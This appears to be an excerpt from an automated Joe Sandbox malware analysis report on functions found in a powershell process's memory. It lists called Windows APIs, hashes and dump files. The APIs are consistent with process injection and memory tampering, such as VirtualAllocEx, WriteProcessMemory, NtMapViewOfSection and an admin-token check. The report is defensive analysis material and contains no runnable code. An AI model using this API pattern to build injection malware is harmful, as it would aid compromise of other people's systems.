Opcode Fuzzy Hash: e1580dfa70b3980f766e965672b95bf8708a4f973e05a7db7a48af4142a1e277
Instruction Fuzzy Hash: 9541413A316780D6E760CF09E44079A73A4F76BBC0F180115EE8893B99CB3EC45ACB01

Function 000001A6ED34CC00 Relevance: 6.1, APIs: 4, Instructions: 88filenativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000001A6ED34CC8D
NtMapViewOfSection.NTDLL ref: 000001A6ED34CCCC
GetCurrentProcess.KERNEL32 ref: 000001A6ED34CCE3
MapViewOfFile.KERNEL32 ref: 000001A6ED34CD4A

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CurrentProcessView$FileSection
String ID:
API String ID: 2388031229-0
Opcode ID: 118eb2577b6059a491439a17f4c90e5e0be91d91b4f98844fba68de29d8fe3b0
Instruction ID: 8a21af2221d1a9e7e8815488ea05132e89b063582c224d6f717b5f29bb387445
Opcode Fuzzy Hash: 118eb2577b6059a491439a17f4c90e5e0be91d91b4f98844fba68de29d8fe3b0
Instruction Fuzzy Hash: 6041603A61AB80C6E760CF45F54479AB7A0F397795F180115EA8903B68CB7DC54ACB01

Function 000001A6ED34D1C8 Relevance: 6.1, APIs: 4, Instructions: 76memorynativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000001A6ED34D23A
NtAllocateVirtualMemory.NTDLL ref: 000001A6ED34D274
VirtualAlloc.KERNEL32 ref: 000001A6ED34D2B0
VirtualAllocEx.KERNEL32 ref: 000001A6ED34D2C8

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$AllocateCurrentMemoryProcess
String ID:
API String ID: 3902775219-0
Opcode ID: aae31d7e320f49b2b7b8d2523f04f5552282cf255c9fc24f679e558ee007d563
Instruction ID: 48f64830bdc8c6f414000ae256e3b15c7ab14b40af9c887061cfb9bb0975e5cc
Opcode Fuzzy Hash: aae31d7e320f49b2b7b8d2523f04f5552282cf255c9fc24f679e558ee007d563
Instruction Fuzzy Hash: 6C314E3D316B40C6EA60CF5AB440699B7A4F7B7BC1F4C5511EE4987B94DB3DC80A8B02

Function 000001A6ED34D3B8 Relevance: 6.1, APIs: 4, Instructions: 75memorynativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000001A6ED34D42B
NtProtectVirtualMemory.NTDLL ref: 000001A6ED34D462
VirtualProtect.KERNEL32 ref: 000001A6ED34D49E
VirtualProtectEx.KERNEL32 ref: 000001A6ED34D4B7

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$CurrentMemoryProcess
String ID:
API String ID: 261991438-0
Opcode ID: aac624e9975941b750356ceb78cd3aa232c6bd2fb96b7d29432793f1a6c54ced
Instruction ID: 0d5a2627f423246835cf0707f182346fceff1385d24aa27d59f2e38a3919b72f
Opcode Fuzzy Hash: aac624e9975941b750356ceb78cd3aa232c6bd2fb96b7d29432793f1a6c54ced
Instruction Fuzzy Hash: 39313E3D316A40C6EA60CF0AB8406D963A4F7A7BD5F0C1021ED4A83B94DF7DD44A8702

Function 000001A6ED345854 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000001A6ED34587B
Sleep.KERNEL32 ref: 000001A6ED3458CA
GetTickCount.KERNEL32 ref: 000001A6ED3458D0
WSAGetLastError.WS2_32 ref: 000001A6ED3458DA

Part of subcall function 000001A6ED345A20: ioctlsocket.WS2_32 ref: 000001A6ED345A42

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepioctlsocket
String ID:
API String ID: 1121440892-0
Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
Instruction ID: 5b03a0b2c8518d638205d7d33f3b94edfeb3d55423c7a6a42d8ad1dab2c9d044
Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
Instruction Fuzzy Hash: B7317C3AB02B40C6EB10DBA6E4842DC37B5F39AB90F590226DE6D93795DF35C51AC341

Function 000001A6ED34D4D8 Relevance: 6.1, APIs: 4, Instructions: 60nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000001A6ED34D535
NtQueryVirtualMemory.NTDLL ref: 000001A6ED34D556
GetCurrentProcess.KERNEL32 ref: 000001A6ED34D56D
VirtualQuery.KERNEL32 ref: 000001A6ED34D5A7

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CurrentProcessQueryVirtual$Memory
String ID:
API String ID: 1933613124-0
Opcode ID: b5efc3e791b05cc6dcc5ce5b56e213e37854e6aa99ab2d2b8288867ca5ef005e
Instruction ID: 848e2c90c93cb2198ea01976cfc8a1f2e498d2a75e48797f70b39ef57c0989d7
Opcode Fuzzy Hash: b5efc3e791b05cc6dcc5ce5b56e213e37854e6aa99ab2d2b8288867ca5ef005e
Instruction Fuzzy Hash: 5E218C3D306A40C6EA60CB09B94039AB3A4F76BBD5F5C1151EE8943BA8DF7DC0498B02

Function 000001A6ED34D134 Relevance: 6.0, APIs: 4, Instructions: 39filenativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000001A6ED34D161
NtUnmapViewOfSection.NTDLL ref: 000001A6ED34D16D
GetCurrentProcess.KERNEL32 ref: 000001A6ED34D195
UnmapViewOfFile.KERNEL32 ref: 000001A6ED34D1B4

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CurrentProcessUnmapView$FileSection
String ID:
API String ID: 3412689278-0
Opcode ID: b253132bd93df092bbcb7d528c8152120b06c1cec35a35f00afab75cbae75278
Instruction ID: 3e50e12915f3a443a26c4310207876e71815763784dd316a712a8b1639b02fa4
Opcode Fuzzy Hash: b253132bd93df092bbcb7d528c8152120b06c1cec35a35f00afab75cbae75278
Instruction Fuzzy Hash: 3B011A3C703A40D1FAA4DB59B9843E922A1AB6BBC2F1D6025DC1986799CA2DC48DC202

Function 000001A6ED30B7B0 Relevance: 5.9, Strings: 4, Instructions: 884COMMONLIBRARYCODE

Download Yara Rule

Strings

ailure #%d - %s, xrefs: 000001A6ED30C41F, 000001A6ED30C498, 000001A6ED30C511, 000001A6ED30C58A
<, xrefs: 000001A6ED30BE6E
, xrefs: 000001A6ED30BE63
e ', xrefs: 000001A6ED30C405, 000001A6ED30C47E, 000001A6ED30C4F7, 000001A6ED30C570

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID: $<$ailure #%d - %s$e '
API String ID: 0-963976815
Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction ID: efd3525285ac1edc3f1c9fd5283b122e0e9543fa6027cfa0c8ff14496570e496
Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction Fuzzy Hash: BE92F1B6325A8087DB58CB1DE4A173AB7A1F3C9B84F44512AEB9B87794DE3CC451CB04

Function 000001A6ED33DA3C Relevance: 4.9, APIs: 3, Instructions: 374memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001A6ED346114: htonl.WS2_32 ref: 000001A6ED346131

Part of subcall function 000001A6ED34C7E4: NtCreateSection.NTDLL ref: 000001A6ED34C88B

GetLastError.KERNEL32 ref: 000001A6ED33DD33

Part of subcall function 000001A6ED34CC00: GetCurrentProcess.KERNEL32 ref: 000001A6ED34CC8D
Part of subcall function 000001A6ED34CC00: NtMapViewOfSection.NTDLL ref: 000001A6ED34CCCC

Part of subcall function 000001A6ED34C754: NtClose.NTDLL ref: 000001A6ED34C788

HeapCreate.KERNEL32 ref: 000001A6ED33DCDA
HeapAlloc.KERNEL32 ref: 000001A6ED33DCF8

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CreateHeapSection$AllocCloseCurrentErrorLastProcessViewhtonl
String ID:
API String ID: 3796667589-0
Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
Instruction ID: a40a7b366b861d7e36eac45087f3fedf377f71567f01973d5e41ade23fd56e19
Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
Instruction Fuzzy Hash: 14E19E7A712B00C3FB64CB29ED453EA63A1F767755F0C5125DB9A87A92DA3CE049C301

Function 000001A6ED34CD6C Relevance: 4.6, APIs: 3, Instructions: 68nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

NtOpenProcess.NTDLL ref: 000001A6ED34CE0D
SetLastError.KERNEL32 ref: 000001A6ED34CE44
OpenProcess.KERNEL32 ref: 000001A6ED34CE51

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: OpenProcess$ErrorLast
String ID:
API String ID: 3102587992-0
Opcode ID: bd326562b4ff6c633cb76e410411fd619726b6735ad6ee4be883c68742826dfd
Instruction ID: ebe658993545c25b0d972be393bdba88cb982cb795eaee100faa27b1b19c5620
Opcode Fuzzy Hash: bd326562b4ff6c633cb76e410411fd619726b6735ad6ee4be883c68742826dfd
Instruction Fuzzy Hash: 8531813A712A10DAE760CF29E8447DA37B0F327755F5C0425DD1943A94DB3AC8CACB42

Function 000001A6ED34717C Relevance: 4.5, APIs: 3, Instructions: 38networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

recv.WS2_32 ref: 000001A6ED3471AF
shutdown.WS2_32 ref: 000001A6ED3471E5
closesocket.WS2_32 ref: 000001A6ED3471EE

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: closesocketrecvshutdown
String ID:
API String ID: 1995099135-0
Opcode ID: 331f0389b8b07663a6df5fa77fc594723cc724e5c71f8b940aeecd857598e751
Instruction ID: d7d2fc07519aace1a73d008f74ae2be86832d8db702edaa520608254613f5b51
Opcode Fuzzy Hash: 331f0389b8b07663a6df5fa77fc594723cc724e5c71f8b940aeecd857598e751
Instruction Fuzzy Hash: 50F04938325A50C6E724CB6EBA8576D6250B757FE0F5C0124EEA943F94CB2DC0468741

Function 000001A6ED34DEC8 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 000001A6ED34DF17
CheckTokenMembership.ADVAPI32 ref: 000001A6ED34DF2E
FreeSid.ADVAPI32 ref: 000001A6ED34DF3F

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
Instruction ID: 177e31c69faa1b324172db12fa0baf39064e7af1f03f0093fc7e4face522460f
Opcode Fuzzy Hash: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
Instruction Fuzzy Hash: 4D014877624A81CFE720CF24E8493AE33A0F36576EF011909E65946A98CB7CC159CB80

Function 000001A6ED35C3B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE

Download Yara Rule

Strings

<, xrefs: 000001A6ED35CA6E
, xrefs: 000001A6ED35CA63

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID: $<
API String ID: 0-428540627
Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction ID: c812a09c720e6c2b669cc27623182727a1e5cb713aba74b480310413665698b8
Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction Fuzzy Hash: E892F1B6325A8087DB58CB1DE4A173AB7A1F3C9B84F44512AEB9B87794CE3CC551CB04

Function 000001A6ED34CA74 Relevance: 3.1, APIs: 2, Instructions: 69nativeCOMMON

Download Yara Rule

APIs

NtDuplicateObject.NTDLL ref: 000001A6ED34CB10
DuplicateHandle.KERNEL32 ref: 000001A6ED34CB56

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Duplicate$HandleObject
String ID:
API String ID: 2838832959-0
Opcode ID: 7cb6f6876c3122bade6416d72dbf0b8d0d1f606e86f6ec4eb2d33c2b9b9b6cdd
Instruction ID: a385a2eec89b2d71593e97754d49b12a66229a9d3f9025f9c2989254b65724d6
Opcode Fuzzy Hash: 7cb6f6876c3122bade6416d72dbf0b8d0d1f606e86f6ec4eb2d33c2b9b9b6cdd
Instruction Fuzzy Hash: 4B2183B9316780C6EB60CF1AA44079A77A4F36BBC4F1C4115DE4953BA8CB7DD45ACB01

Function 000001A6ED34C7E4 Relevance: 3.1, APIs: 2, Instructions: 68nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 000001A6ED34C88B
CreateFileMappingA.KERNEL32 ref: 000001A6ED34C8D0

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Create$FileMappingSection
String ID:
API String ID: 2333316925-0
Opcode ID: 6e3e0d6d8752c6fcaa429a015979b2c61ad311e0c52e89c0e23b952435a7e56c
Instruction ID: ce51897d9f01445c4a566ad7bbea79d2b935d014ce88c7aedeb114682bb68dd1
Opcode Fuzzy Hash: 6e3e0d6d8752c6fcaa429a015979b2c61ad311e0c52e89c0e23b952435a7e56c
Instruction Fuzzy Hash: 8631533A715B50C6E7A4CF1AE54079A77A1F3ABB80F584115EE4883B94DF3EC849CB41

Function 000001A6ED34CE74 Relevance: 3.1, APIs: 2, Instructions: 64threadnativeCOMMON

Download Yara Rule

APIs

NtOpenThread.NTDLL ref: 000001A6ED34CF11
OpenThread.KERNEL32 ref: 000001A6ED34CF40

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: OpenThread
String ID:
API String ID: 3092547327-0
Opcode ID: f6c8be7d9aaf512aa223d62816ea205a430fdf05a21a98b8b4eea950b1956d50
Instruction ID: e2b2eb7a7a2e5e357b0a978aab77feabb7b04dd107060c31b4aea6ff3a1c8083
Opcode Fuzzy Hash: f6c8be7d9aaf512aa223d62816ea205a430fdf05a21a98b8b4eea950b1956d50
Instruction Fuzzy Hash: 43215E3A712A10E6E750CB19A8407D933B4F767795F1C101AED0957AA4CB3AC88ACB02

Function 000001A6ED34D5C4 Relevance: 3.1, APIs: 2, Instructions: 55nativeinjectionCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 000001A6ED34D60C
WriteProcessMemory.KERNEL32 ref: 000001A6ED34D677

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: MemoryWrite$ProcessVirtual
String ID:
API String ID: 3286974703-0
Opcode ID: ac90821cdf529fd4bc9d244ebf53c86ca0a89fa6251bc383fd419e42e6ef3592
Instruction ID: 4a03dec2d518ab0371588442a329fb0b7b2a8f3e442a0ca84b5b18b75fdc593a
Opcode Fuzzy Hash: ac90821cdf529fd4bc9d244ebf53c86ca0a89fa6251bc383fd419e42e6ef3592
Instruction Fuzzy Hash: 66211839706B40C2EB50CB0AB84469A73A4F767BD1F5C5125DE5C437A8DB3DC8698B02

Function 000001A6ED34CF60 Relevance: 3.1, APIs: 2, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 000001A6ED34CFA8
ReadProcessMemory.KERNEL32 ref: 000001A6ED34D013

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: MemoryRead$ProcessVirtual
String ID:
API String ID: 187914430-0
Opcode ID: f1da16c026c726b767b85992fa2562048d500a6963b4a2322859e3c208df85f4
Instruction ID: 3ef61f34693601a080b8ff2d38e27d642454571e9087a15c9ef3e88c31e0a188
Opcode Fuzzy Hash: f1da16c026c726b767b85992fa2562048d500a6963b4a2322859e3c208df85f4
Instruction Fuzzy Hash: 83210E3A716B80C1EB20CF0AF44469A73A4FB6BBC0F1C4126EA5C47795DB3EC85A8701

Function 000001A6ED34D2EC Relevance: 3.0, APIs: 2, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000001A6ED34D33F
VirtualFree.KERNEL32 ref: 000001A6ED34D3A2

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CurrentFreeProcessVirtual
String ID:
API String ID: 2843569277-0
Opcode ID: 33013136f0bb95f1eb9f3645b418df4a5ff2efb559231014e174e8ee2656166c
Instruction ID: ccdc5476eae4ebeb42efa7ae74ecf12e444f1ae4374016e43cce4a875010552c
Opcode Fuzzy Hash: 33013136f0bb95f1eb9f3645b418df4a5ff2efb559231014e174e8ee2656166c
Instruction Fuzzy Hash: 3A212C3C706A40D1E760CB09B4503DA73A0B76B7D6F5C2515D94987BA4DB7DC48ACB02

